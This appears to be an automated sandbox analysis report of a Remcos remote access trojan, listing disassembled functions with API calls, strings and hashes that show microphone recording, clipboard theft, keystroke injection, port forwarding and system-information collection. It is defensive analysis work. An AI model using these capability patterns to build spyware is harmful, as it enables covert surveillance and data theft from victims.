                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Eventinet_ntoa
                                                                                                                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                              • API String ID: 3578746661-4192532303
                                                                                                                                                                                              • Opcode ID: 30b6b719644d82d783a8bc9089df8f8f99093d3b204285341a7bcfdb0059d80f
                                                                                                                                                                                              • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 30b6b719644d82d783a8bc9089df8f8f99093d3b204285341a7bcfdb0059d80f
                                                                                                                                                                                              • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                                                                                              Function 00455149 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                                                                                              • Opcode ID: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                                                                                                                                                              • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                                                                                                                                                              • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                                                                                                              Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                              • API String ID: 1462127192-2001430897
                                                                                                                                                                                              • Opcode ID: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                                                                                                                                                              • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                                                                                              • Opcode Fuzzy Hash: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                                                                                              Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                              • API String ID: 3809562944-3643129801
                                                                                                                                                                                              • Opcode ID: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                                                                                                                                                              • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                              Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                              • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                              • String ID: XCG$`=G$x=G
                                                                                                                                                                                              • API String ID: 1356121797-903574159
                                                                                                                                                                                              • Opcode ID: cbcac788c718bd7f67303107ca832eedb4aafd95f91c6a7e1c6cfce26f1e3068
                                                                                                                                                                                              • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: cbcac788c718bd7f67303107ca832eedb4aafd95f91c6a7e1c6cfce26f1e3068
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                              Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                                                                                                • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                              • String ID: Remcos
                                                                                                                                                                                              • API String ID: 1970332568-165870891
                                                                                                                                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                              • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                              Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                                                                                                              • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                                                                                                              • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                                                                                              Function 00452B3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?), ref: 00452BE6
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C69
                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CFC
                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D13
                                                                                                                                                                                                • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D8F
                                                                                                                                                                                              • __freea.LIBCMT ref: 00452DBA
                                                                                                                                                                                              • __freea.LIBCMT ref: 00452DC6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3256262068-0
                                                                                                                                                                                              • Opcode ID: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                                                                                              • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                                                                                              • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                                                                                                              Function 00444409 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                                                                                                              • _free.LIBCMT ref: 00444724
                                                                                                                                                                                              • _free.LIBCMT ref: 0044473D
                                                                                                                                                                                              • _free.LIBCMT ref: 0044476F
                                                                                                                                                                                              • _free.LIBCMT ref: 00444778
                                                                                                                                                                                              • _free.LIBCMT ref: 00444784
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                              • Opcode ID: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
                                                                                                                                                                                              • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
                                                                                                                                                                                              • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                                                                                                                                                              Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: tcp$udp
                                                                                                                                                                                              • API String ID: 0-3725065008
                                                                                                                                                                                              • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                                                                                              • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                              Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                              • String ID: .part
                                                                                                                                                                                              • API String ID: 1303771098-3499674018
                                                                                                                                                                                              • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                                                                                                              • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                                                                                                                                                              • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                                                                              Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0041A906
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                              • API String ID: 37874593-703403762
                                                                                                                                                                                              • Opcode ID: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
                                                                                                                                                                                              • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                                                                                                                                                              Function 00449960 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004499F2
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B47
                                                                                                                                                                                                • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B50
                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B75
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2597970681-0
                                                                                                                                                                                              • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                                                                                                              • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                                                                                                                                                                              • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                                                                                                                                                              Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendInput.USER32 ref: 00418B18
                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                                                                                                                                                                • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InputSend$Virtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1167301434-0
                                                                                                                                                                                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                              • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                                                                                                              Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2172192267-0
                                                                                                                                                                                              • Opcode ID: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                                                                                                                                                              • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                                                                                              Function 00446169 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
